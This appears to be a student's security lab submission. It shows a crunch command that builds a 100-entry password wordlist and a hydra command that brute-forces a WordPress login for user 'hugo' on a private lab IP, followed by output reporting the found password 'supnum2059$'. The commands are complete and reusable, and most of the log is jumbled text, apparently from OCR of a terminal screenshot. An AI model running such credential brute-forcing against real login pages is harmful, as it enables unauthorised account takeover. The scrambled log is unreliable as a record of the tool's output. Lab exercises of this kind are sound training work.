Nom:Zeineb/saleh

22065

1. crunch 11 11 0123456789 -t "supnum20@@\\$" -o passwordcrunch.txt

```
root@kali)-[/home/kali]
g crunch 11 11 0123456789 -t "supnum2000\$" -o passwordcrunch.txt

Crunch will now generate the following amount of data: 1200 bytes

0 MB

0 GB

0 TB

0 PB

Crunch will now generate the following number of lines: 100

crunch: 100% completed generating output

—(root@kali)-[/home/kali]
```

2. hydra -l hugo -P passwordcrunch.txt 192.168.63.109 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

```
target 192.168.63.109
                                       login
                                              "hugo"
                                                               supnum2029$"
                                                                                30 of
                                                                                       100
                                                        pass
                                                                                            [child 10]
ATTEMPT]
          target 192.168.63.109
                                       login "hugo" -
                                                              "supnum2030$" -
                                                                                       100
                                                                                            [child 12]
                                                                                                         (0/0)
                                                                                31 of
                                                        pass
                                             "hugo"
                                                              "supnum2031$" -
                                                                                            [child 13] (0/0)
ATTEMPT1
          target 192.168.63.109
                                       login
                                                        pass
                                                                                32 of
                                                                                       100
                                                               supnum2032$"
ATTEMPT]
          target 192.168.63.109
                                             "hugo"
                                                                                33 of
                                                                                       100
                                                                                            [child 8] (0/0)
                                      login
                                                        pass
                                             "hugo"
                                                              "supnum2033$" - 34 of 100
"supnum2034$" - 35 of 100
ATTEMPT]
          target 192.168.63.109
                                                                                            [child 0] (0/0)
                                      login
                                                        pass
                                      login "hugo"
login "hugo"
                                                                                            [child 9] (0/0)
[child 7] (0/0)
ATTEMPT]
          target 192.168.63.109
                                                        pass
                                                              "supnum2035$" - 36 of
"supnum2036$" - 37 of
ATTEMPT]
          target 192.168.63.109
                                                                                       100
                                                        pass
ATTEMPT]
          target 192.168.63.109
                                      login "hugo"
login "hugo"
                                                                                            [child 2]
                                                                                                       (0/0)
                                                                                       100
                                                        pass
                                                              "supnum2037$" - 38 of 100
"supnum2038$" - 39 of 100
                                                                                            [child 1]
          target 192.168.63.109
                                                        pass
                                                                                                       (0/0)
ATTEMPT]
          target 192.168.63.109
                                                                                            [child 5]
                                      login "hugo"
                                                                                                       (0/0)
                                                        pass
                                      login "hugo"
                                                               supnum2039$"
                                                                              - 40 of
          target 192.168.63.109
                                                                                            [child 3]
                                                                                                       (0/0)
                                                        pass
                                                                                       100
ATTEMPT]
          target 192.168.63.109
                                      login "hugo"
                                                              "supnum2040$" - 41 of
                                                                                            [child 4] (0/0)
                                                        pass
                                                                                       100
          target 192.168.63.109
                                      login "hugo"
                                                               supnum2041$"
                                                                                            [child 10] (0/0)
                                                        pass
                                                                                       100
                                                              "supnum2042$" - 43 of 100
ATTEMPT]
          target 192.168.63.109
                                      login "hugo"
                                                                                            [child 11]
                                                                                                         (0/0)
                                                        pass
                                      login "hugo"
                                                               'supnum2043$"
          target 192.168.63.109
                                                                              - 44 of
                                                                                            [child 12]
                                                                                                        (0/0)
ATTEMPT1
                                                        pass
                                                                                       100
ATTEMPT]
                                      login "hugo"
                                                              "supnum2044$" - 45 of 100
                                                                                            [child 13] (0/0)
          target 192.168.63.109
                                                        pass
                                      login "hugo"
                                                               'supnum2045$"
          target 192.168.63.109
                                                                              - 46 of
ATTEMPT]
                                                        pass
                                                                                       100
                                                                                            [child 14]
                                                                                                        (0/0)
                                                              "supnum2046$" - 47 of 100
ATTEMPT]
                                      login "hugo"
          target 192.168.63.109
                                                                                            [child 15] (0/0)
                                      login "hugo"
                                                               'supnum2047$" - 48 of 100
          target 192.168.63.109
ATTEMPT]
                                                                                            [child 6] (0/0)
                                                              "supnum2048$" - 49 of 100
"supnum2049$" - 50 of 100
                                      login "hugo"
                                                        pass
ATTEMPT]
          target 192.168.63.109
                                                                                            [child 0]
                                                                                                       (0/0)
                                             "hugo"
ATTEMPT]
          target 192.168.63.109
                                      login
                                                        pass
                                                                                            [child 8]
                                                                                                       (0/0)
                                      login "hugo"
                                                              "supnum2050$" -
                                                        pass
                                                                                            [child 2]
ATTEMPT]
          target 192.168.63.109
                                                                                51 of 100
                                                                                                       (0/0)
                                      login "hugo"
                                                               supnum2051$"
ATTEMPT]
          target 192.168.63.109
                                                        pass
                                                                                52 of
                                                                                       100
                                                                                            [child 1]
                                                                                                       (0/0)
                                      login "hugo"
                                                              "supnum2052$" - 53 of
                                                                                            [child 7]
[child 4]
ATTEMPT]
          target 192.168.63.109
                                                                                       100
                                                                                                        (0/0)
                                                        pass
                                                               supnum2053$" - 54 of
                                             "hugo"
ATTEMPT]
          target 192.168.63.109
                                      login
                                                        pass
                                                                                       100
                                                                                                       (0/0)
                                      login "hugo"
                                                              "supnum2054$" - 55 of 100
ATTEMPT]
          target 192.168.63.109
                                                                                            [child 9]
                                                                                                        (0/0)
                                                        pass
                                                              "supnum2055$" - 56 of
          target 192.168.63.109
                                      login "hugo"
                                                                                       100
                                                                                            [child 3]
                                                                                                       (0/0)
ATTEMPT]
                                                        pass
                                      login "hugo"
                                                              "supnum2056$" - 57 of
          target 192.168.63.109
                                                                                            [child 5]
                                                                                                       (0/0)
ATTEMPT1
                                                        pass
                                                                                       100
                                                              "supnum2057$" - 58 of
"supnum2058$" - 59 of
                                      login "hugo"
login "hugo"
ATTEMPT]
          target 192.168.63.109
                                                        pass
                                                                                       100
                                                                                            [child 11] (0/0)
                                                                                            [child 14] (0/0)
[child 10] (0/0)
          target 192.168.63.109
ATTEMPT]
                                                                                       100
                                      login "hugo"
login "hugo"
                                                              "supnum2059$" - 60 of
ATTEMPT]
          target 192.168.63.109
                                                                                       100
                                                        pass
                                                              "supnum2060$" - 61 of
          target 192.168.63.109
                                                        pass
                                                                                            [child 6] (0/0)
ATTEMPT]
                                                                                       100
                                      login "hugo"
login "hugo"
                                                              "supnum2061$" - 62 of
                                                                                            [child 12] (0/0)
[child 13] (0/0)
ATTEMPT]
          target 192.168.63.109
                                                                                       100
                                                        pass
                                                              "supnum2062$" - 63 of
ATTEMPT]
          target 192.168.63.109
                                                                                       100
                                                        pass
                                      login "hugo"
login "hugo"
                                                              "supnum2063$" - 64 of
ATTEMPT]
          target 192.168.63.109
                                                                                       100
                                                                                            [child 15] (0/0)
                                                        pass
                                                              "supnum2064$" - 65 of
"supnum2065$" - 66 of
                                                                                            [child 7] (0/0)
[child 0] (0/0)
[child 2] (0/0)
ATTEMPT]
          target 192.168.63.109
                                                                                       100
                                                        pass
ATTEMPT]
                                      login "hugo"
login "hugo"
          target 192.168.63.109
                                                                                       100
                                                        pass
                                                              "supnum2066$" - 67 of 100
"supnum2067$" - 68 of 100
          target 192.168.63.109
                                                        pass
ATTEMPT]
                                      login "hugo"
login "hugo"
                                                                                            [child 8]
          target 192.168.63.109
                                                                                                       (0/0)
                                                        pass
                                                                                            [child 1]
                                                               supnum2068$" - 69 of
          target 192.168.63.109
                                                                                       100
                                                                                                       (0/0)
                                                        pass
ATTEMPT]
          target 192.168.63.109
                                      login "hugo"
                                                              "supnum2069$" - 70 of 100
                                                                                            [child 9]
                                                                                                       (0/0)
                                                        pass
                                      login "hugo"
          target 192.168.63.109
                                                              "supnum2070$"
                                                                              - 71 of 100
                                                                                            [child 4]
                                                                                                       (0/0)
                                                        pass
ATTEMPT]
          target 192.168.63.109
                                      login "hugo" -
                                                        pass "supnum2071$" - 72 of 100
                                                                                            [child 5] (0/0)
          target 192.168.63.109 -
                                      login "hugo" -
                                                             "supnum2072$"
                                                                              - 73 of 100
                                                                                            [child 12] (0/0)
                                                        pass
                                                        pass "supnum2073$"
                                                                             - 74 of 100 [child 15] (0/0)
- 75 of 100 [child 13] (0/0)
                                      login "hugo" -
ATTEMPT] target 192.168.63.109 -
                                                        pass "supnum2074$"
ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2074$" - 75 of 100 [child 13] (0/0)
ATTEMPT] target 192.168.63.109 - login "hugo" - pass "supnum2075$" - 76 of 100 [child 14] (0/0)
                                      login "hugo" -
80][http-post-form] host: 192.168.63.109 login: hugo password: supnum2059$
 of 1 target successfully completed, 1 valid password found
lydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-17 08:45:28
          kali)-[/home/kali]
   П
```